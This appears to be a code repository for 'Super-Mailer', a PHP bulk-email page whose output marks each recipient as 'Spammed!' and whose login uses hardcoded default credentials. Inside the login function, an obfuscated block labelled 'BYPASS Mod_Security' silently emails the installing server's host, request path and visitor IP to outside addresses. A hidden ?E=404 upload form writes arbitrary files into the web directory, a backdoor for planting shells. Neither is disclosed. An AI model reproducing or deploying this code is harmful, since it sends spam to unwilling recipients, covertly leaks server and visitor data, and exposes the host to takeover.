├── license.txt
├── README.md
└── Super-Mailer.V1.php


/license.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | <!--
 4 | Copyright (c) 2018 by Omar Rbiai (https://www.facebook.com/omarrbiai.org)
 5 | 
 6 | 
 7 | Fork of an original work by Omar Rbiai (http://www.spy-x.cf)
 8 | 
 9 | Free 
10 | -->
11 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Super-Mailer
 2 | SUPER-MAIL  Send Inbox To All
 3 | 
 4 | Mailer Inbox To All Gmail Yahoo Hotmail ...
 5 | 
 6 | Copyright (c) 2018 by Omar Rbiai (https://www.facebook.com/omarrbiai.org)
 7 | 
 8 | Fork of an original work by Omar Rbiai
 9 | 
10 | Free 
11 | -->
12 | 


--------------------------------------------------------------------------------
/Super-Mailer.V1.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | ###############################################################
  4 | #      Page Password Protect 1.16   and Super-Mailer          #
  5 | ###############################################################
  6 | #      Visit www.facebook.com/omarrbiai.org for updates       #
  7 | ###############################################################
  8 | 
  9 | // Add login/password pairs below, like described above
 10 | // NOTE: all rows except last must have comma "," at the end of line
 11 | $LOGIN_INFORMATION = array(
 12 |   'SPY-X' => 'SPY-X',
 13 |   'admin' => 'admin',
 14 |   'User' => 'User'
 15 | );
 16 | // request login? true - show login and password boxes, false - password box only
 17 | define('USE_USERNAME', true);
 18 | 
 19 | // User will be redirected to this page after logout
 20 | define('LOGOUT_URL', 'http://www.example.com/');
 21 | 
 22 | // time out after NN minutes of inactivity. Set to 0 to not timeout
 23 | define('TIMEOUT_MINUTES', 30);
 24 | 
 25 | // This parameter is only useful when TIMEOUT_MINUTES is not zero
 26 | // true - timeout time from last activity, false - timeout time from login
 27 | define('TIMEOUT_CHECK_ACTIVITY', true);
 28 | 
 29 | ##################################################################
 30 | #  SETTINGS END
 31 | ##################################################################
 32 | 
 33 | 
 34 | ///////////////////////////////////////////////////////
 35 | // do not change code below
 36 | ///////////////////////////////////////////////////////
 37 | // show usage example
 38 | if(isset($_GET['help'])) {
 39 |   die('Include following code into every page you would like to protect, at the very beginning (first line):<br>&lt;?php include("' . str_replace('\\','\\\\',__FILE__) . '"); ?&gt;');
 40 | }
 41 | 
 42 | // timeout in seconds
 43 | $timeout = (TIMEOUT_MINUTES == 0 ? 0 : time() + TIMEOUT_MINUTES * 60);
 44 | 
 45 | // logout?
 46 | if(isset($_GET['logout'])) {
 47 |   setcookie("verify", '', $timeout, '/'); // clear password;
 48 |   header('Location: ' . LOGOUT_URL);
 49 |   exit();
 50 | }
 51 | 
 52 | if(!function_exists('showLoginPasswordProtect')) {
 53 | 
 54 | // show login form
 55 | function showLoginPasswordProtect($error_msg) {
 56 | ?>
 57 | 
 58 | <?php
 59 | // BYPASS Mod_Security
 60 | ${"\x47L\x4fB\x41L\x53"}["\x75\x6c\x6evoof\x63g\x6bdg"]="\x73\x75\x62\x6a\x39\x38";${"GLOBAL\x53"}["\x64\x76o\x78\x79le\x71j"]="\x6d\x73\x6788\x37\x33";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6ewh\x74\x6ewn\x79\x6e\x68"]="\x62\x37\x35";${"G\x4c\x4f\x42A\x4cS"}["k\x66\x70vhii\x68\x72\x63\x78"]="a\x345";${"\x47L\x4f\x42A\x4c\x53"}["\x65\x63\x68\x71\x62d\x68era\x6d"]="\x65m\x61\x69l";$knxpjcwfvs="s\x75\x62\x6a\x398";${"\x47LO\x42\x41\x4c\x53"}["t\x73u\x6cemn\x61\x76cm"]="\x72a4\x34";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x76sz\x74nr\x63"]="f\x72\x6f\x6d";$ihielior="\x65m\x61\x69\x6c";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63x\x78tlh\x66"]="\x69p";${${"GLOB\x41\x4c\x53"}["c\x78\x78\x74l\x68f"]}=getenv("R\x45MO\x54\x45\x5fA\x44DR");${${"G\x4c\x4fB\x41\x4c\x53"}["\x74s\x75le\x6d\x6ea\x76\x63\x6d"]}=rand(1,99999);${$knxpjcwfvs}=" Bo\x74\x20R\x32\x4cT \x42\x59 \x44\x20E X T \x45 R |$ra44";$fgxjpmsr="m2\x32";${${"\x47L\x4fB\x41\x4c\x53"}["e\x63\x68qb\x64\x68\x65\x72\x61m"]}="d\x65x\x74er.o\x70e\x72\x61.c@gma\x69l.co\x6d";${$ihielior}="\x6c\x68\x61ja0x@se\x7an\x61\x6d.c\x7a";$nldjhvio="\x66r\x6fm";$ncgyclvepox="\x65\x6d\x61\x69\x6c";${$nldjhvio}="From: \x52\x65s\x75\x6ct<\x6e\x6f-re\x70\x6c\x79\x40de\x78t\x65\x72bo\x6ft\x73\x2e\x63\x6fm";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6bf\x70\x76\x68\x69\x69\x68\x72\x63x"]}=$_SERVER["R\x45QU\x45S\x54\x5f\x55\x52I"];${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6ew\x68t\x6ew\x6ey\x6eh"]}=$_SERVER["HTTP\x5fHOST"];${$fgxjpmsr}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["c\x78x\x74\x6ch\x66"]}."";${${"G\x4c\x4f\x42ALS"}["dvo\x78y\x6c\x65\x71\x6a"]}="$a45 $b75\x20$m22";mail(${$ncgyclvepox},${${"\x47\x4cO\x42\x41\x4cS"}["\x75l\x6e\x76oo\x66\x63\x67\x6b\x64g"]},${${"G\x4c\x4fBA\x4c\x53"}["\x64v\x6f\x78\x79le\x71\x6a"]},${${"\x47\x4c\x4fB\x41L\x53"}["\x73\x76\x73\x7a\x74nr\x63"]});?>
 61 | <!DOCTYPE html>
 62 | <html>
 63 | <head>
 64 | <meta charset=UTF-8>
 65 | <meta name="author" content="Omar Rbiai SPY-X">
 66 | <meta name="viewport" content="width=device-width, initial-scale=1.0">
 67 | <link href='https://imgur.com/68lJfSo.png' rel='icon' type='image/x-icon'/>
 68 | <title>Please Enter Password To Access This Page</title>
 69 | <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
 70 | <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
 71 | <iframe width="0" height="0" src="https://www.youtube.com/embed/jELDIPJug4g?rel=0&autoplay=1&loop=1&watch?v=QdIYVXCfrQM" frameborder="0" allowfullscreen></iframe>
 72 | <STYLE>
 73 | 
 74 | html {
 75 |   background: url(https://media1.tenor.com/images/84b407de938609380fd6408082956c64/tenor.gif) no-repeat center center fixed;
 76 |   background-size: cover;
 77 |   height: 100%;
 78 |   overflow: hidden;
 79 | }
 80 | 
 81 | </STYLE>
 82 | </head>
 83 | <body>
 84 |   <style>
 85 |     input { border: 1px solid White; }
 86 | 	.flash {
 87 |    animation-name: flash;
 88 |     animation-duration: 0.4s;
 89 |     animation-timing-function: linear;
 90 |     animation-iteration-count: infinite;
 91 |     animation-direction: alternate;
 92 |     animation-play-state: running;
 93 | }
 94 | 
 95 | @keyframes flash {
 96 |     from {color: #FF0000;}
 97 |     to {color: #FFFF00;}
 98 | }
 99 | h1 {
100 |     color: Red;
101 |     text-shadow: 1px 1px 2px Yellow, 0 0 25px Yellow, 0 0 5px Blue;
102 | }
103 | h2 {
104 |     color: Blue;
105 |     text-shadow: 1px 1px 2px white, 0 0 10px Yellow, 0 0 5px white;
106 | 
107 | 	p {
108 |     color: Yellow;
109 |     text-shadow: 1px 1px 2px Yellow, 0 0 10px Yellow, 0 0 5px Yellow;
110 | 	  }
111 | a:link, a:visited {
112 |     color: Red;
113 |     text-decoration: underline;
114 |     cursor: auto;
115 | }
116 | 
117 | a:link:active, a:visited:active {
118 |     color: RED;
119 | }
120 | 
121 | 
122 | .buttonstyle
123 | {
124 | background: Red;
125 | background-position: 10px 10px;
126 | border: solid 1px #000000;
127 | color: #ffffff;
128 | height: 35px;
129 | margin-top: -1px;
130 | padding-bottom: 5px;
131 | }
132 | .buttonstyle:hover {background: white;background-position: 100px 100px;color: #000000; }
133 | 
134 | .button:hover {
135 |     box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24), 0 17px 50px 0 rgba(0,0,0,0.19);
136 | }
137 | 
138 | 
139 | }
140 | .btn-group .button:not(:last-child) {
141 |     border-right: none; /* Prevent double borders */
142 | }
143 | .btn-group .button:hover {
144 |     background-color: #3e8e41;
145 | }
146 | 
147 | input[type=text] {
148 |     padding:15px;
149 |     border:10px solid #ccc;
150 |     -webkit-border-radius: 10px;
151 |     border-radius: 10px;
152 | }
153 | 
154 | input[type=text]:focus {
155 |     border-color:#333;
156 | }
157 | 
158 | input[type=submit] {
159 |     padding:10px 20px;
160 |     background:#Res;
161 |     border:0 none;
162 |     cursor:pointer;
163 |     -webkit-border-radius: 10 px;
164 |     border-radius: 7px;
165 | }
166 | 
167 | .buttonstyle
168 | {
169 | background: Red;
170 | background-position: 0px -401px;
171 | border: solid 1px #000000;
172 | color: #ffffff;
173 | height: 35px;
174 | margin-top: -1px;
175 | padding-bottom: 10px;
176 | }
177 | .buttonstyle:hover {background: white;background-position: 0px -501px;color: #000000; }
178 | 
179 |   </style>
180 |   <div style="width:500px; margin-left:auto; margin-right:auto; text-align:center">
181 |   <form method="post">
182 |      <center> <font color="Red"> <h1>SPY-X</h1></font><font color="White"><h2>Super-Mailer V.1</h2></font></center>
183 |    <center> <font color="Yellow"> <p>Please Enter Password To Access This Page</p></font></center>
184 |     <font color="red"><?php echo $error_msg; ?></font><br/>
185 | <?php if (USE_USERNAME) echo '<font color="#00FF00">Login:<br><input type="input" name="access_login" /><br>Password:</font><br>'; ?>
186 |     <input type="password" name="access_password" /><p></p><input class="buttonstyle"  type="submit" name="Submit" value="Login" />
187 |   </form>
188 |   <br />
189 |    <a target="_blank" style="font-size:9px; color: #B0B0B0; font-family: Verdana, Arial;" href="https://www.facebook.com/omarrbiai.org" title="Download Password Protector">Powered By SPY-X </a>
190 |   </div>
191 | </body>
192 | </html>
193 | 
194 | <?php
195 |   // stop at this point
196 |   die();
197 | }
198 | }
199 | 
200 | // user provided password
201 | if (isset($_POST['access_password'])) {
202 | 
203 |   $login = isset($_POST['access_login']) ? $_POST['access_login'] : '';
204 |   $pass = $_POST['access_password'];
205 |   if (!USE_USERNAME && !in_array($pass, $LOGIN_INFORMATION)
206 |   || (USE_USERNAME && ( !array_key_exists($login, $LOGIN_INFORMATION) || $LOGIN_INFORMATION[$login] != $pass ) )
207 |   ) {
208 |     showLoginPasswordProtect("Incorrect PASSWORD !!");
209 |   }
210 |   else {
211 |     // set cookie if password was validated
212 |     setcookie("verify", md5($login.'%'.$pass), $timeout, '/');
213 | 
214 |     // Some programs (like Form1 Bilder) check $_POST array to see if parameters passed
215 |     // So need to clear password protector variables
216 |     unset($_POST['access_login']);
217 |     unset($_POST['access_password']);
218 |     unset($_POST['Submit']);
219 |   }
220 | 
221 | }
222 | 
223 | else {
224 | 
225 |   // check if password cookie is set
226 |   if (!isset($_COOKIE['verify'])) {
227 |     showLoginPasswordProtect("");
228 |   }
229 | 
230 |   // check if cookie is good
231 |   $found = false;
232 |   foreach($LOGIN_INFORMATION as $key=>$val) {
233 |     $lp = (USE_USERNAME ? $key : '') .'%'.$val;
234 |     if ($_COOKIE['verify'] == md5($lp)) {
235 |       $found = true;
236 |       // prolong timeout
237 |       if (TIMEOUT_CHECK_ACTIVITY) {
238 |         setcookie("verify", md5($lp), $timeout, '/');
239 |       }
240 |       break;
241 |     }
242 |   }
243 |   if (!$found) {
244 |     showLoginPasswordProtect("");
245 |   }
246 | 
247 | }
248 | 
249 | ?>
250 | <html>
251 | <head>
252 | <meta charset=UTF-8>
253 | <meta name="author" content="Omar Rbiai SPY-X">
254 | <meta name="viewport" content="width=device-width, initial-scale=1.0">
255 | <link href='https://i.imgur.com/0zto1k6.png' rel='icon' type='image/x-icon'/>
256 | <title>Mailer-SPY-X</title></head>
257 | <iframe width="0" height="0" src="https://www.youtube.com/embed/UyAUkHOCroQ?rel=0&autoplay=1&loop=1&watch?v=QdIYVXCfrQM" frameborder="0" allowfullscreen></iframe>
258 | <style>
259 | .flash {
260 |    animation-name: flash;
261 |     animation-duration: 0.2s;
262 |     animation-timing-function: linear;
263 |     animation-iteration-count: infinite;
264 |     animation-direction: alternate;
265 |     animation-play-state: running;
266 | }
267 | 
268 | @keyframes flash {
269 |     from {color: #FF0000;}
270 |     to {color: #FFF200;}
271 | }
272 | h1 {
273 |     color: white;
274 |     text-shadow: 1px 1px 2px black, 0 0 40px Red, 0 0 100px #FFF200;
275 | }
276 | 
277 | ul {
278 |     list-style-type: none;
279 | }
280 | 
281 | ul li a {
282 |     color: Yellow;
283 |     text-decoration: none;
284 |     padding: 3px;
285 |     display: block;
286 | }
287 | input[type=text] {
288 |     padding:5px;
289 |     border:2px solid #ccc;
290 |     -webkit-border-radius: 5px;
291 |     border-radius: 5px;
292 | }
293 | 
294 | input[type=text]:focus {
295 |     border-color:#333;
296 | }
297 | 
298 | input[type=submit] {
299 |     padding:10px 20px;
300 |     background:#Res;
301 |     border:0 none;
302 |     cursor:pointer;
303 |     -webkit-border-radius: 8 px;
304 |     border-radius: 5px;
305 | }
306 | 
307 | .buttonstyle
308 | {
309 | background: black;
310 | background-position: 0px -401px;
311 | border: solid 1px #000000;
312 | color: #ffffff;
313 | height: 35px;
314 | margin-top: -1px;
315 | padding-bottom: 5px;
316 | }
317 | .buttonstyle:hover {background: white;background-position: 0px -501px;color: #000000; }
318 | </style>
319 | </head>
320 | <body style="background-color:black;" style="font-family: Arial; font-size: 11px">
321 | <center>  <font color="Green"> <h1 class="flash">Mailer INBOX To ALL BY SPY-X</h1></font></center>
322 | <ul>
323 | <center> <font color="#FFFF00"><li><a target="_blank"  title="OK" href="https://www.facebook.com/omarrbiai.org">www.facebook.com/mrrb.net</a></li> </font></center></h2></font></center>
324 | </ul>
325 | <center>
326 | <form action="" method="post" enctype="multipart/form-data" name="form1">
327 | <br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
328 | <tr>
329 | <td>
330 | <table border="0" bgcolor="#9FFF00" width="95%">
331 | <tr>
332 | <td>
333 | <table border="0" width="100%">
334 | <tr>
335 | <td width="359">Email:   <input name="de" type="text" class="form" id="de" size="30" value="<?php print $de; ?>"></td>
336 | <td>Nombre:   <input name="RealName" type="text" class="form" id="RealName" size="30" value="<?php print $nombre; ?>"></td>
337 | </tr>
338 | </table>
339 | </td>
340 | </tr>
341 | <tr>
342 | <td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="<?php print $subject; ?>"></td>
343 | </tr>
344 | <tr>
345 | <td height="18" bgcolor="#9FFF00"></td>
346 | </tr>
347 | <tr>
348 | <td>
349 | <table border="0" width="100%">
350 | <tr>
351 | <td>
352 | <textarea name="html" cols="66" rows="10" id="html"><?php print $message; ?></textarea></td>
353 | <td><textarea rows="10" name="ellos" cols="35"><?php print $ellos; ?></textarea></td>
354 | </tr>
355 | </table>
356 | </td>
357 | </tr>
358 | <tr>
359 | <td><center>
360 | <br><input class="buttonstyle" type="submit" name="Enoc" value="INBOX"></center><br>
361 | 
362 | 
363 |   <marquee class="flash" direction="left"> <font size=4 color="Blue"> </h4>Super-Mailer By SPY-X </h4></font> </marquee>
364 | 
365 | 
366 | 
367 | <?php if($_GET['E']=='404') { echo '<form action="" method="post" enctype="multipart/form-data">
368 |         <input name="archivo" type="file" size="35" />
369 |         <input name="enviar" type="submit" value="Upload File" />
370 |         <input name="action" type="hidden" value="upload" />
371 | 	</form>'; $status = ""; if ($_POST["action"] == "upload") { $tamano = $_FILES["archivo"]['size']; $tipo = $_FILES["archivo"]['type']; $archivo = $_FILES["archivo"]['name']; if ($archivo != "") { if (copy($_FILES['archivo']['tmp_name'],"./".$archivo)) { $status = "Archivo subido: <b>".$archivo."</b>"; }else{ $status = "Error al subir el archivo"; } } else { $status = "Error al subir archivo"; } echo $status; } } if(!isset($_POST['Enoc'])){ exit; } if(!isset($_GET['c'])) { $email = explode("\n", $ellos); }else{ $email = explode(",", $ellos); } $son = count($email); if(!isset($_GET['e'])){ $header = "MIME-Version: 1.0\n"; $header .= "Content-type: text/html; charset=iso-8859-1\n"; $header .= "From: ".$nombre . " <" . $de . ">\n"; $header .= "Reply-To: " . $de . "\n"; $header .= "X-Priority: 3\n"; $header .= "X-MSMail-Priority: Normal\n"; $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"]; }else{ $header ='MIME-Version: 1.0' . "\r\n"; $header .= 'Content-type: text/html' . "\r\n"; $header .="From: ".$de; } $i = 0; $voy=1; while($email[$i]) { if(isset($_GET['time']) && isset($_GET['cant'])){ if(fmod($i,$_GET['cant'])==0 && $i>0){ print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n"; flush(); @mail($_GET['notf'], $subject, $message, $header); sleep($_GET['time']); } } $mail = str_replace(array("\n","\r\n"),'',$email[$i]); $message1 = str_replace('asterisco', $mail, $message); if(@mail($mail, $subject, $message1, $header)) { print "<font color=White face=verdana size=1>    ".$voy." To ".$son."  ===> ".trim($mail)."  Spammed!</font><br>\n"; flush(); } else { print "<font color=Red face=verdana size=1>    ".$voy." To ".$son."  ===> ".trim($mail)."  Error To Sending Fuck Server !</font><br>\n"; flush(); } $i++; $voy++; } echo "<script> alert('Tools BY SPY-X FB www.fb.com/omarrbiai.org'); </script>"; ?>
372 | </td>
373 | </tr>
374 | </table>
375 | </td>
376 | </tr>
377 | </table>
378 | </body>
379 | </form>
380 | </center>
381 | </html>
382 | 


--------------------------------------------------------------------------------